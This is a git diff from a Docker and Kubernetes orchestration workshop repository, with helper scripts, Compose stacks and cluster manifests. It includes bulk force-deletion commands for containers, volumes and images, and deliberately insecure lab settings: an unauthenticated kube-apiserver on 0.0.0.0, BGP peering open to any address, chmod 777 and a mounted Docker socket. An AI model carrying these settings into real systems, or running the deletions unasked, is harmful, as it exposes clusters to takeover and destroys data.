    # TODO: check inconsistencies between port mappings
    frontend_ports[service_name] = frontend_port
    if service_name not in backends:
        backends[service_name] = []
    backends[service_name].append((backend_addr, backend_port))

# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=ambassador.project={}".format(project_name),
    "--format", '{{ .ID }} '
                '{{ .Label "ambassador.service" }} '
                '{{ .Label "ambassador.bindaddr" }}',
])

# Update ambassadors.
operations = []
for ambassador in ambassadors_data.split('\n'):
    if not ambassador:
        continue
    ambassador_id, service_name, bind_address = ambassador.split()
    print("Updating configuration for {}/{} -> {}:{} -> {}"
          .format(service_name, ambassador_id,
                  bind_address, frontend_ports[service_name],
                  backends[service_name]))
    command = [
        ambassador_id,
        "docker", "run", "--rm", "--volumes-from", ambassador_id,
        "jpetazzo/hamba", "reconfigure",
        "{}:{}".format(bind_address, frontend_ports[service_name])
    ]
    for backend_addr, backend_port in backends[service_name]:
        command.extend([backend_addr, backend_port])
    operations.append(command)

# Execute all commands in parallel.
parallel_run(operations, 10)
@@ -1,71 +0,0 @@
#!/usr/bin/env python

from common import ComposeFile, parallel_run
import os
import subprocess

config = ComposeFile()

project_name = os.path.basename(os.path.realpath("."))

# Get all services in our compose application.
containers_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=com.docker.compose.project={}".format(project_name),
    "--format", '{{ .ID }} {{ .Label "com.docker.compose.service" }}',
])

# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=ambassador.project={}".format(project_name),
    "--format", '{{ .ID }} '
                '{{ .Label "ambassador.container" }} '
                '{{ .Label "ambassador.service" }}',
])

# Build a set of existing ambassadors.
ambassadors = dict()
for ambassador in ambassadors_data.split('\n'):
    if not ambassador:
        continue
    ambassador_id, container_id, linked_service = ambassador.split()
    ambassadors[container_id, linked_service] = ambassador_id

operations = []

# Start the missing ambassadors.
for container in containers_data.split('\n'):
    if not container:
        continue
    container_id, service_name = container.split()
    extra_hosts = config.services[service_name].get("extra_hosts", {})
    for linked_service, bind_address in extra_hosts.items():
        description = "Ambassador {}/{}/{}".format(
            service_name, container_id, linked_service)
        ambassador_id = ambassadors.pop((container_id, linked_service), None)
        if ambassador_id:
            print("{} already exists: {}".format(description, ambassador_id))
        else:
            print("{} not found, creating it.".format(description))
            operations.append([
                description,
                "docker", "run", "-d",
                "--net", "container:{}".format(container_id),
                "--label", "ambassador.project={}".format(project_name),
                "--label", "ambassador.container={}".format(container_id),
                "--label", "ambassador.service={}".format(linked_service),
                "--label", "ambassador.bindaddr={}".format(bind_address),
                "jpetazzo/hamba", "run"
            ])

# Destroy extraneous ambassadors.
for ambassador_id in ambassadors.values():
    print("{} is not useful anymore, destroying it.".format(ambassador_id))
    operations.append([
        "rm -f {}".format(ambassador_id),
        "docker", "rm", "-f", ambassador_id,
    ])

# Execute all commands in parallel.
parallel_run(operations, 10)
@@ -1,3 +0,0 @@
#!/bin/sh
docker ps -q --filter label=ambassador.project=dockercoins |
xargs docker rm -f
@@ -1,16 +0,0 @@
#!/bin/sh
# Some tools will choke on the YAML files generated by PyYAML;
# in particular on a section like this one:
#
# service:
#   ports:
#   - 8000:5000
#
# This script adds two spaces in front of the dash in those files.
# Warning: it is a hack, and probably won't work on some YAML files.
[ -f "$COMPOSE_FILE" ] || {
    echo "Cannot find COMPOSE_FILE"
    exit 1
}
sed -i 's/^  -/    -/' $COMPOSE_FILE
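To see the PyYAML output that motivates this hack, here is a tiny sketch (the data is made up; note that the dash ends up at the same indentation level as `ports:`):

```python
# Demonstrates the PyYAML indentation that some tools choke on.
import yaml

print(yaml.safe_dump({"service": {"ports": ["8000:5000"]}},
                     default_flow_style=False))
# service:
#   ports:
#   - 8000:5000
```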
@@ -1,38 +0,0 @@
#!/usr/bin/env python

from common import ComposeFile
import yaml

config = ComposeFile()

# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))

def generate_local_addr():
    last_byte = 2
    while last_byte<255:
        yield "127.127.0.{}".format(last_byte)
        last_byte += 1

for service_name, service in config.services.items():
    if "links" in service:
        for link, local_addr in zip(service["links"], generate_local_addr()):
            if link not in ports:
                print("Skipping link {} in service {} "
                      "(no port mapping defined). "
                      "Your code will probably break."
                      .format(link, service_name))
                continue
            if "extra_hosts" not in service:
                service["extra_hosts"] = {}
            service["extra_hosts"][link] = local_addr
        del service["links"]
    if "ports" in service:
        del service["ports"]
    if "volumes" in service:
        del service["volumes"]
    if service_name in ports:
        service["ports"] = [ ports[service_name] ]

config.save()
@@ -1,46 +0,0 @@
#!/usr/bin/env python

# FIXME: hardcoded
PORT="80"

import os
import subprocess

project_name = os.path.basename(os.path.realpath("."))

# Get all existing services for this application.
containers_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=com.docker.compose.project={}".format(project_name),
    "--format", '{{ .Label "com.docker.compose.service" }} '
                '{{ .Label "com.docker.compose.container-number" }} '
                '{{ .Label "loadbalancer" }}',
])

load_balancers = dict()
for line in containers_data.split('\n'):
    if not line:
        continue
    service_name, container_number, load_balancer = line.split(' ')
    if load_balancer:
        if load_balancer not in load_balancers:
            load_balancers[load_balancer] = []
        load_balancers[load_balancer].append((service_name, int(container_number)))

for load_balancer, backends in load_balancers.items():
    # FIXME: iterate on all load balancers
    container_name = "{}_{}_1".format(project_name, load_balancer)
    command = [
        "docker", "run", "--rm",
        "--volumes-from", container_name,
        "--net", "container:{}".format(container_name),
        "jpetazzo/hamba", "reconfigure", PORT,
    ]
    command.extend(
        "{}_{}_{}:{}".format(project_name, backend_name, backend_number, PORT)
        for (backend_name, backend_number) in sorted(backends)
    )
    print("Updating configuration for {} with {} backend(s)..."
          .format(container_name, len(backends)))
    subprocess.check_output(command)
@@ -1,201 +0,0 @@
#!/bin/sh
unset DOCKER_REGISTRY
unset DOCKER_HOST
unset COMPOSE_FILE

SWARM_IMAGE=${SWARM_IMAGE:-swarm}

prepare_1_check_ssh_keys () {
    for N in $(seq 1 5); do
        ssh node$N true
    done
}

prepare_2_compile_swarm () {
    cd ~
    git clone git://github.com/docker/swarm
    cd swarm
    [[ -z "$1" ]] && {
        echo "Specify which revision to build."
        return
    }
    git checkout "$1" || return
    mkdir -p image
    docker build -t docker/swarm:$1 .
    docker run -i --entrypoint sh docker/swarm:$1 \
        -c 'cat $(which swarm)' > image/swarm
    chmod +x image/swarm
    cat >image/Dockerfile <<EOF
FROM scratch
COPY ./swarm /swarm
ENTRYPOINT ["/swarm", "-debug", "-experimental"]
EOF
    docker build -t jpetazzo/swarm:$1 image
    docker login
    docker push jpetazzo/swarm:$1
    docker logout
    SWARM_IMAGE=jpetazzo/swarm:$1
}

clean_1_containers () {
    for N in $(seq 1 5); do
        ssh node$N "docker ps -aq | xargs -r -n1 -P10 docker rm -f"
    done
}

clean_2_volumes () {
    for N in $(seq 1 5); do
        ssh node$N "docker volume ls -q | xargs -r docker volume rm"
    done
}

clean_3_images () {
    for N in $(seq 1 5); do
        ssh node$N "docker images | awk '/dockercoins|jpetazzo/ {print \$1\":\"\$2}' | xargs -r docker rmi -f"
    done
}

clean_4_machines () {
    rm -rf ~/.docker/machine/
}

clean_all () {
    clean_1_containers
    clean_2_volumes
    clean_3_images
    clean_4_machines
}

dm_swarm () {
    eval $(docker-machine env node1 --swarm)
}
dm_node1 () {
    eval $(docker-machine env node1)
}

setup_1_swarm () {
    grep node[12345] /etc/hosts | grep -v ^127 |
    while read IPADDR NODENAME; do
        docker-machine create --driver generic \
            --engine-opt cluster-store=consul://localhost:8500 \
            --engine-opt cluster-advertise=eth0:2376 \
            --swarm --swarm-master --swarm-image $SWARM_IMAGE \
            --swarm-discovery consul://localhost:8500 \
            --swarm-opt replication --swarm-opt advertise=$IPADDR:3376 \
            --generic-ssh-user docker --generic-ip-address $IPADDR $NODENAME
    done
}

setup_2_consul () {
    IPADDR=$(ssh node1 ip a ls dev eth0 |
             sed -n 's,.*inet \(.*\)/.*,\1,p')

    for N in 1 2 3 4 5; do
        ssh node$N -- docker run -d --restart=always --name consul_node$N \
            -e CONSUL_BIND_INTERFACE=eth0 --net host consul \
            agent -server -retry-join $IPADDR -bootstrap-expect 5 \
            -ui -client 0.0.0.0
    done
}

setup_3_wait () {
    # Wait for a Swarm master
    dm_swarm
    while ! docker ps; do sleep 1; done

    # Wait for all nodes to be there
    while ! [ "$(docker info | grep "^Nodes:")" = "Nodes: 5" ]; do sleep 1; done
}

setup_4_registry () {
    cd ~/orchestration-workshop/registry
    dm_swarm
    docker-compose up -d
    for N in $(seq 2 5); do
        docker-compose scale frontend=$N
    done
}

setup_5_btp_dockercoins () {
    cd ~/orchestration-workshop/dockercoins
    dm_node1
    export DOCKER_REGISTRY=localhost:5000
    cp docker-compose.yml-v2 docker-compose.yml
    ~/orchestration-workshop/bin/build-tag-push.py | tee /tmp/btp.log
    export $(tail -n 1 /tmp/btp.log)
}

setup_6_add_lbs () {
    cd ~/orchestration-workshop/dockercoins
    ~/orchestration-workshop/bin/add-load-balancer-v2.py rng
    ~/orchestration-workshop/bin/add-load-balancer-v2.py hasher
}

setup_7_consulfs () {
    dm_swarm
    docker pull jpetazzo/consulfs
    for N in $(seq 1 5); do
        ssh node$N "docker run --rm -v /usr/local/bin:/target jpetazzo/consulfs"
        ssh node$N mkdir -p ~/consul
        ssh -f node$N "mountpoint ~/consul || consulfs localhost:8500 ~/consul"
    done
}

setup_8_syncmachine () {
    while ! mountpoint ~/consul; do
        sleep 1
    done
    cp -r ~/.docker/machine ~/consul/
    for N in $(seq 2 5); do
        ssh node$N mkdir -p ~/.docker
        ssh node$N "[ -L ~/.docker/machine ] || ln -s ~/consul/machine ~/.docker"
    done
}

setup_9_elk () {
    dm_swarm
    cd ~/orchestration-workshop/elk
    docker-compose up -d
    for N in $(seq 1 5); do
        docker-compose scale logstash=$N
    done
}

setup_all () {
    setup_1_swarm
    setup_2_consul
    setup_3_wait
    setup_4_registry
    setup_5_btp_dockercoins
    setup_6_add_lbs
    setup_7_consulfs
    setup_8_syncmachine
    dm_swarm
}


force_remove_network () {
    dm_swarm
    NET="$1"
    for CNAME in $(docker network inspect $NET | grep Name | grep -v \"$NET\" | cut -d\" -f4); do
        echo $CNAME
        docker network disconnect -f $NET $CNAME
    done
    docker network rm $NET
}

demo_1_compose_up () {
    dm_swarm
    cd ~/orchestration-workshop/dockercoins
    docker-compose up -d
}

grep -qs -- MAGICMARKER "$0" && { # Don't display this line in the function list
    echo "You should source this file, then invoke the following functions:"
    grep -- '^[a-z].*{$' "$0" | cut -d" " -f1
}

show_swarm_primary () {
    dm_swarm
    docker info 2>/dev/null | grep -e ^Role -e ^Primary
}
@@ -1,12 +0,0 @@
version: "2"

services:
  cadvisor:
    image: google/cadvisor
    ports:
      - "8080:8080"
    volumes:
      - "/:/rootfs:ro"
      - "/var/run:/var/run:rw"
      - "/sys:/sys:ro"
      - "/var/lib/docker/:/var/lib/docker:ro"
@@ -1,19 +0,0 @@
# CEPH on Docker

Note: this doesn't quite work yet.

The OSD containers need to be started twice (the first time, they fail
initializing; the second time is a champ).

Also, it looks like you need at least two OSD containers (or the OSD
container should have two disks/directories, whatever).

RadosGw is listening on port 8080.

The `admin` container will create a `docker` user using `radosgw-admin`.
If you run it multiple times, that's OK: further invocations are idempotent.

Last but not least: it looks like the AWS CLI uses a new signature format
that doesn't work with RadosGW. After almost two hours trying to figure
out what was wrong, I tried the S3 credentials directly with boto and
it worked immediately (I was able to create a bucket).
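For reference, a minimal sketch of the boto test mentioned above (endpoint, credentials, and bucket name are placeholders; classic `boto` is assumed because it still speaks the older S3 signature format):

```python
# Hypothetical RadosGW smoke test with classic boto.
import boto
import boto.s3.connection

conn = boto.connect_s3(
    aws_access_key_id="ACCESS_KEY",        # placeholder
    aws_secret_access_key="SECRET_KEY",    # placeholder
    host="localhost", port=8080, is_secure=False,
    calling_format=boto.s3.connection.OrdinaryCallingFormat(),
)
bucket = conn.create_bucket("test-bucket")
print(bucket.name)
```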
@@ -1,53 +0,0 @@
version: "2"

services:
  mon:
    image: ceph/daemon
    command: mon
    environment:
      CEPH_PUBLIC_NETWORK: 10.33.0.0/16
      MON_IP: 10.33.0.2
  osd:
    image: ceph/daemon
    command: osd_directory
    depends_on:
      - mon
    volumes_from:
      - mon
    volumes:
      - /var/lib/ceph/osd
  mds:
    image: ceph/daemon
    command: mds
    environment:
      CEPHFS_CREATE: 1
    depends_on:
      - mon
    volumes_from:
      - mon
  rgw:
    image: ceph/daemon
    command: rgw
    depends_on:
      - mon
    volumes_from:
      - mon
    environment:
      CEPH_OPTS: --verbose
  admin:
    image: ceph/daemon
    entrypoint: radosgw-admin
    depends_on:
      - mon
    volumes_from:
      - mon
    command: user create --uid=docker --display-name=docker

networks:
  default:
    ipam:
      driver: default
      config:
        - subnet: 10.33.0.0/16
          gateway: 10.33.0.1
compose/frr-route-reflector/conf/bgpd.conf (new file)
@@ -0,0 +1,9 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout
compose/frr-route-reflector/conf/vtysh.conf (new empty file)

compose/frr-route-reflector/conf/zebra.conf (new file)
@@ -0,0 +1,2 @@
hostname frr
log stdout
compose/frr-route-reflector/docker-compose.yaml (new file)
@@ -0,0 +1,34 @@
version: "3"

services:
  bgpd:
    image: ajones17/frr:662
    volumes:
      - ./conf:/etc/frr
      - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
    restart: always

  zebra:
    image: ajones17/frr:662
    volumes:
      - ./conf:/etc/frr
      - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
    restart: always

  vtysh:
    image: ajones17/frr:662
    volumes:
      - ./conf:/etc/frr
      - ./run:/var/run/frr
    network_mode: host
    entrypoint: vtysh -c "show ip bgp"

  chmod:
    image: alpine
    volumes:
      - ./run:/var/run/frr
    command: chmod 777 /var/run/frr
compose/kube-router-k8s-control-plane/docker-compose.yaml (new file)
@@ -0,0 +1,29 @@
version: "3"

services:

  pause:
    ports:
      - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.3.10
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
    "Edit the CLUSTER placeholder first. Then, remove this line.":

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-scheduler --master http://localhost:8080
compose/kube-router-k8s-control-plane/kuberouter.yaml (new file)
@@ -0,0 +1,128 @@
---
apiVersion: |+


  Make sure you update the line with --master=http://X.X.X.X:8080 below.
  Then remove this section from this YAML file and try again.

---
apiVersion: v1
kind: ConfigMap
metadata:
  name: kube-router-cfg
  namespace: kube-system
  labels:
    tier: node
    k8s-app: kube-router
data:
  cni-conf.json: |
    {
      "cniVersion":"0.3.0",
      "name":"mynet",
      "plugins":[
        {
          "name":"kubernetes",
          "type":"bridge",
          "bridge":"kube-bridge",
          "isDefaultGateway":true,
          "ipam":{
            "type":"host-local"
          }
        }
      ]
    }
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  labels:
    k8s-app: kube-router
    tier: node
  name: kube-router
  namespace: kube-system
spec:
  template:
    metadata:
      labels:
        k8s-app: kube-router
        tier: node
      annotations:
        scheduler.alpha.kubernetes.io/critical-pod: ''
    spec:
      serviceAccountName: kube-router
      containers:
      - name: kube-router
        image: docker.io/cloudnativelabs/kube-router
        imagePullPolicy: Always
        args:
        - "--run-router=true"
        - "--run-firewall=true"
        - "--run-service-proxy=true"
        - "--master=http://X.X.X.X:8080"
        env:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        - name: KUBE_ROUTER_CNI_CONF_FILE
          value: /etc/cni/net.d/10-kuberouter.conflist
        livenessProbe:
          httpGet:
            path: /healthz
            port: 20244
          initialDelaySeconds: 10
          periodSeconds: 3
        resources:
          requests:
            cpu: 250m
            memory: 250Mi
        securityContext:
          privileged: true
        volumeMounts:
        - name: lib-modules
          mountPath: /lib/modules
          readOnly: true
        - name: cni-conf-dir
          mountPath: /etc/cni/net.d
      initContainers:
      - name: install-cni
        image: busybox
        imagePullPolicy: Always
        command:
        - /bin/sh
        - -c
        - set -e -x;
          if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
            if [ -f /etc/cni/net.d/*.conf ]; then
              rm -f /etc/cni/net.d/*.conf;
            fi;
            TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
            cp /etc/kube-router/cni-conf.json ${TMP};
            mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
          fi
        volumeMounts:
        - mountPath: /etc/cni/net.d
          name: cni-conf-dir
        - mountPath: /etc/kube-router
          name: kube-router-cfg
      hostNetwork: true
      tolerations:
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
        operator: Exists
      - effect: NoSchedule
        key: node.kubernetes.io/not-ready
        operator: Exists
      volumes:
      - name: lib-modules
        hostPath:
          path: /lib/modules
      - name: cni-conf-dir
        hostPath:
          path: /etc/cni/net.d
      - name: kube-router-cfg
        configMap:
          name: kube-router-cfg
compose/simple-k8s-control-plane/docker-compose.yaml (new file)
@@ -0,0 +1,28 @@
version: "3"

services:

  pause:
    ports:
      - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.3.10
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-controller-manager --master http://localhost:8080

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-scheduler --master http://localhost:8080
@@ -1,12 +0,0 @@
version: "2"
services:
  bootstrap:
    image: jpetazzo/consul
    command: agent -server -bootstrap
    container_name: bootstrap
  server:
    image: jpetazzo/consul
    command: agent -server -join bootstrap -join server
  client:
    image: jpetazzo/consul
    command: members -rpc-addr server:8400
@@ -1,5 +1,5 @@
 FROM ruby:alpine
-RUN apk add --update build-base
+RUN apk add --update build-base curl
 RUN gem install sinatra
 RUN gem install thin
 ADD hasher.rb /
@@ -28,5 +28,5 @@ def rng(how_many_bytes):
 
 
 if __name__ == "__main__":
-    app.run(host="0.0.0.0", port=80)
+    app.run(host="0.0.0.0", port=80, threaded=False)
@@ -50,7 +50,7 @@ function refresh () {
     points.push({ x: s2.now, y: speed });
   }
   $("#speed").text("~" + speed.toFixed(1) + " hashes/second");
-  var msg = ("I'm attending the @docker workshop at #LinuxCon, "
+  var msg = ("I'm attending a @docker orchestration workshop, "
             + "and my #DockerCoins mining rig is crunching "
             + speed.toFixed(1) + " hashes/second! W00T!");
   $("#tweet").attr(
efk/README.md (new file)
@@ -0,0 +1,36 @@
# Elasticsearch + Fluentd + Kibana

This is a variation on the classic "ELK" stack.

The [fluentd](fluentd/) subdirectory contains a Dockerfile to build
a fluentd image embedding a simple configuration file, accepting log
entries on port 24224 and storing them in Elasticsearch in a format
that Kibana can use.

You can also use a pre-built image, `jpetazzo/fluentd:v0.1`
(e.g. if you want to deploy on a cluster and don't want to deploy
your own registry).

Once this fluentd container is running, and assuming you expose
its port 24224/tcp somehow, you can send container logs to fluentd
by using Docker's fluentd logging driver.

You can bring up the whole stack with the associated Compose file.
With Swarm mode, you can bring up the whole stack like this:

```bash
docker network create efk --driver overlay
docker service create --network efk \
       --name elasticsearch elasticsearch:2
docker service create --network efk --publish 5601:5601 \
       --name kibana kibana
docker service create --network efk --publish 24224:24224 \
       --name fluentd jpetazzo/fluentd:v0.1
```

And then, from any node on your cluster, you can send logs to fluentd like this:

```bash
docker run --log-driver fluentd --log-opt fluentd-address=localhost:24224 \
       alpine echo ohai there
```
efk/docker-compose.yml (new file)
@@ -0,0 +1,24 @@
version: "2"

services:
  elasticsearch:
    image: elasticsearch
    # If you need to access ES directly, just uncomment those lines.
    #ports:
    #  - "9200:9200"
    #  - "9300:9300"

  fluentd:
    #build: fluentd
    image: jpetazzo/fluentd:v0.1
    ports:
      - "127.0.0.1:24224:24224"
    depends_on:
      - elasticsearch

  kibana:
    image: kibana
    ports:
      - "5601:5601"
    environment:
      ELASTICSEARCH_URL: http://elasticsearch:9200
efk/fluentd/Dockerfile (new file)
@@ -0,0 +1,5 @@
FROM ruby
RUN gem install fluentd
RUN gem install fluent-plugin-elasticsearch
COPY fluentd.conf /fluentd.conf
CMD ["fluentd", "-c", "/fluentd.conf"]
efk/fluentd/fluentd.conf (new file)
@@ -0,0 +1,12 @@
<source>
  @type forward
  port 24224
  bind 0.0.0.0
</source>

<match **>
  @type elasticsearch
  host elasticsearch
  logstash_format true
  flush_interval 1
</match>
@@ -2,14 +2,14 @@ version: "2"
|
||||
|
||||
services:
|
||||
elasticsearch:
|
||||
image: elasticsearch
|
||||
image: elasticsearch:2
|
||||
# If you need to access ES directly, just uncomment those lines.
|
||||
#ports:
|
||||
# - "9200:9200"
|
||||
# - "9300:9300"
|
||||
|
||||
logstash:
|
||||
image: logstash
|
||||
image: logstash:2
|
||||
command: |
|
||||
-e '
|
||||
input {
|
||||
@@ -47,7 +47,7 @@ services:
|
||||
- "12201:12201/udp"
|
||||
|
||||
kibana:
|
||||
image: kibana
|
||||
image: kibana:4
|
||||
ports:
|
||||
- "5601:5601"
|
||||
environment:
|
||||
|
||||
k8s/consul.yaml (new file)
@@ -0,0 +1,90 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: consul
  labels:
    app: consul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
  labels:
    app: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.4"
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
k8s/docker-build.yaml (new file)
@@ -0,0 +1,28 @@
apiVersion: v1
kind: Pod
metadata:
  name: build-image
spec:
  restartPolicy: OnFailure
  containers:
  - name: docker-build
    image: docker
    env:
    - name: REGISTRY_PORT
      value: #"30000"
    command: ["sh", "-c"]
    args:
    - |
      apk add --no-cache git &&
      mkdir /workspace &&
      git clone https://github.com/jpetazzo/container.training /workspace &&
      docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
      docker push localhost:$REGISTRY_PORT/worker
    volumeMounts:
    - name: docker-socket
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
k8s/efk.yaml (new file)
@@ -0,0 +1,167 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: fluentd
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: fluentd
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - namespaces
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: fluentd
roleRef:
  kind: ClusterRole
  name: fluentd
  apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
  name: fluentd
  namespace: default
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: fluentd
  labels:
    app: fluentd
spec:
  template:
    metadata:
      labels:
        app: fluentd
    spec:
      serviceAccount: fluentd
      serviceAccountName: fluentd
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      containers:
      - name: fluentd
        image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
        env:
        - name: FLUENT_ELASTICSEARCH_HOST
          value: "elasticsearch"
        - name: FLUENT_ELASTICSEARCH_PORT
          value: "9200"
        - name: FLUENT_ELASTICSEARCH_SCHEME
          value: "http"
        - name: FLUENT_UID
          value: "0"
        - name: FLUENTD_SYSTEMD_CONF
          value: "disable"
        - name: FLUENTD_PROMETHEUS_CONF
          value: "disable"
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 200Mi
        volumeMounts:
        - name: varlog
          mountPath: /var/log
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      terminationGracePeriodSeconds: 30
      volumes:
      - name: varlog
        hostPath:
          path: /var/log
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    app: elasticsearch
  name: elasticsearch
spec:
  selector:
    matchLabels:
      app: elasticsearch
  template:
    metadata:
      labels:
        app: elasticsearch
    spec:
      containers:
      - image: elasticsearch:5
        name: elasticsearch
        resources:
          limits:
            memory: 2Gi
          requests:
            memory: 1Gi
        env:
        - name: ES_JAVA_OPTS
          value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: elasticsearch
  name: elasticsearch
spec:
  ports:
  - port: 9200
    protocol: TCP
    targetPort: 9200
  selector:
    app: elasticsearch
  type: ClusterIP
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    app: kibana
  name: kibana
spec:
  selector:
    matchLabels:
      app: kibana
  template:
    metadata:
      labels:
        app: kibana
    spec:
      containers:
      - env:
        - name: ELASTICSEARCH_URL
          value: http://elasticsearch:9200/
        image: kibana:5
        name: kibana
        resources: {}
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: kibana
  name: kibana
spec:
  ports:
  - port: 5601
    protocol: TCP
    targetPort: 5601
  selector:
    app: kibana
  type: NodePort
k8s/elasticsearch-cluster.yaml (new file)
@@ -0,0 +1,21 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
  name: es
spec:
  kibana:
    image: docker.elastic.co/kibana/kibana-oss:6.1.3
    image-pull-policy: Always
  cerebro:
    image: upmcenterprises/cerebro:0.7.2
    image-pull-policy: Always
  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
  image-pull-policy: Always
  client-node-replicas: 2
  master-node-replicas: 3
  data-node-replicas: 3
  network-host: 0.0.0.0
  use-ssl: false
  data-volume-size: 10Gi
  java-options: "-Xms512m -Xmx512m"
k8s/elasticsearch-operator.yaml (new file)
@@ -0,0 +1,94 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
  name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
  resources: ["deployments", "replicasets", "daemonsets"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
  resources: ["customresourcedefinitions"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
  resources: ["cronjobs", "jobs"]
  verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
  resources: ["statefulsets", "deployments"]
  verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
  resources: ["elasticsearchclusters"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: elasticsearch-operator
subjects:
- kind: ServiceAccount
  name: elasticsearch-operator
